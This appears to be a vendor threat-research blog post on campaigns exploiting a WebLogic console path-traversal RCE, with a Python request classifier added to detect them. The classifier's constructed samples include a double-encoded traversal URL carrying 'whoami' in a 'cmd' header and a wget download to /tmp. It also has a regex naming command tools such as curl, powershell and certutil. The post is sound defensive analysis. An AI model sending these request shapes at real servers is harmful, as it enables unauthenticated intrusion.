Recently a new unauthenticated remote code execution vulnerability was disclosed in Oracle WebLogic Server. A path traversal vulnerability in the URL allowed smuggling unauthenticated requests to the management console, invoking dangerous Java classes and resulting in the execution of shell commands on the server. Additional information on the vulnerability and its mitigation with attack signatures is available in our previous article on the matter.
As expected, the simplicity of exploiting this vulnerability allowed different threat actors to adopt it into their arsenals immediately.
Since the vulnerability was published, the F5 Threat Research Team has observed at least five distinct campaigns, which have also been reported by other sources.
Following are several of these campaigns and their mitigation with the Advanced WAF Threat Campaigns feed.
In the most recent campaign, analyzed in detail by Juniper's research team, threat actors leverage this vulnerability to distribute the DarkIRC bot. According to that article, the bot is currently being sold on hacking forums for US$75.
Figure: Threat Campaign mitigating an attempt to execute a PowerShell command on WebLogic Server
Oracle WebLogic Console Path Traversal RCE - Z8qZ
In this campaign, following successful exploitation of the WebLogic server, attackers executed an obfuscated PowerShell spearhead script to drop an agent of the Cobalt Strike framework. Cobalt Strike is a legitimate penetration testing tool, but it is also known to be used by many notorious APT groups. This campaign was analyzed in detail by the Suns research team.
Figure: List of known APT groups using Cobalt Strike in their attacks (Taken from MITRE ATT&CK)
Figure: Threat Campaign mitigating an attempt deploying Cobalt Strike payload on WebLogic Server
This campaign probes for vulnerable WebLogic servers by issuing a "whoami" command in a custom "cmd" request header. The way the attacker executes the command is interesting: usually the command to execute is embedded directly in the exploit payload, but here the exploit code reads it from the "cmd" header instead, so the same request body can be reused with any command the attacker chooses.
Figure: Threat Campaign mitigating an attempt executing OS command on WebLogic Server
This campaign probes for vulnerable servers by forcing the exploited WebLogic server to fetch a URL from a remote server with a "wget" command, so a callback to that server confirms that code execution succeeded.
This campaign is part of a broader operation that also targets other popular systems with publicly available exploits, such as:
Oracle WebLogic Console Path Traversal RCE
Oracle WebLogic WLS Security Component RCE
Plone Zope SAXutils Command Execution
JAWS Web Server Remote Code Execution
ThinkPHP Remote Code Execution
ElasticSearch Search Groovy Sandbox Bypass
Figure: Threat Campaign mitigating an attempt to execute “wget” command on WebLogic Server
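The two probing techniques above (an OS command smuggled in a custom "cmd" header, and a "wget" callback passed in the request) can both be caught by the same check: percent-decode the request target until it stops changing, look for a traversal sequence under the console path, and then look for a command in the headers or query parameters. The following Python is an added example written for this post, not F5's Threat Campaign signature logic or any attacker's code. The sample requests are constructed; the exact traversal segment used (a double URL-encoded "../" under /console/images/) and the hostnames and IP addresses are assumptions for illustration only.

```python
"""Added example: flag WebLogic console path-traversal requests that carry an
OS command in a custom "cmd" header or in a query parameter.  Not F5's
signature logic; sample requests below are constructed, not captured traffic."""
import re
from urllib.parse import parse_qs, unquote

# Constructed sample requests.  The traversal segment shape (double-encoded
# "../" under /console/images/) and the addresses are assumptions.
SAMPLES = {
    "cmd_header_probe": (
        "GET /console/images/%252E%252E%252Fconsole.portal?_nfpb=true HTTP/1.1\r\n"
        "Host: weblogic.example.test:7001\r\n"
        "User-Agent: Mozilla/5.0\r\n"
        "cmd: whoami\r\n\r\n"
    ),
    "wget_in_query": (
        "GET /console/images/%252E%252E%252Fconsole.portal"
        "?_nfpb=true&cmd=wget%20http://203.0.113.5/x.sh%20-O%20/tmp/x.sh HTTP/1.1\r\n"
        "Host: weblogic.example.test:7001\r\n\r\n"
    ),
    "benign_image": (
        "GET /console/images/logo.png HTTP/1.1\r\n"
        "Host: weblogic.example.test:7001\r\n\r\n"
    ),
    "benign_login": (
        "GET /console/login/LoginForm.jsp HTTP/1.1\r\n"
        "Host: weblogic.example.test:7001\r\n\r\n"
    ),
}

# Command words seen in the probes discussed on this page plus a few common
# download/execution helpers.  Group 1 is the matched command word.
COMMAND_HINTS = re.compile(
    r"(?i)(?:^|[^\w/])(whoami|wget|curl|powershell|cmd\.exe|certutil|/bin/(?:ba)?sh)(?![\w-])"
)
# "/../" or "\..\" after decoding, anchored at a path separator or string edge.
TRAVERSAL = re.compile(r"(?:^|[/\\])\.\.(?:[/\\]|$)")


def decode_fully(value: str, max_rounds: int = 3) -> str:
    """Percent-decode repeatedly (bounded) so %252E%252E%252F -> %2E%2E%2F -> ../
    is seen as a traversal even though a single decode would miss it."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request head into method, path, query and headers."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    path, _, query = target.partition("?")
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "query": query, "headers": headers}


def is_console_traversal(path: str) -> bool:
    """True when the fully decoded path is under /console/ and contains '..'."""
    decoded = decode_fully(path)
    return decoded.lower().startswith("/console/") and TRAVERSAL.search(decoded) is not None


def find_command(req: dict):
    """Return (location, command) for the first command indicator, else None.
    A custom "cmd" header is treated as a command regardless of its value, since
    the probe on this page relies on the exploit reading it; query parameter
    values are decoded and matched against COMMAND_HINTS."""
    cmd_header = req["headers"].get("cmd")
    if cmd_header:
        return ("header:cmd", decode_fully(cmd_header))
    for name, values in parse_qs(req["query"], keep_blank_values=True).items():
        for value in values:
            decoded = decode_fully(value)  # parse_qs decoded once; catch double-encoding
            if COMMAND_HINTS.search(decoded):
                return (f"query:{name}", decoded)
    return None


def classify(raw: str) -> dict:
    """Combine the two checks into a verdict for one raw request."""
    req = parse_request(raw)
    traversal = is_console_traversal(req["path"])
    command = find_command(req)
    if traversal and command:
        verdict = "block: console traversal with OS command"
    elif traversal:
        verdict = "block: console traversal"
    elif command:
        verdict = "alert: command indicator without traversal"
    else:
        verdict = "allow"
    return {"traversal": traversal, "command": command, "verdict": verdict}


if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(f"{name:18} {classify(raw)['verdict']}")
```

The traversal check is deliberately separate from the command check: a console traversal request is worth blocking on its own, since unauthenticated access to the console path is the root problem, while a command indicator outside that path is only worth an alert because benign parameters can contain words such as "curl". Bounding the decode loop keeps a deliberately nested encoding from turning the check into a CPU sink.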
Advanced WAF Threat Campaigns allow customers to detect and mitigate web vulnerabilities that are actively exploited by adversaries, without false positives and with additional context on the attack.